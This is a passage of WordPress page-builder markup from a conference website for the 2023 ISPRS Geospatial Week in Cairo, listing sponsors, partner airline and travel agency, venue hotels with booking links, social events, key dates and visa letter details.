/></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"]</p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h5>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 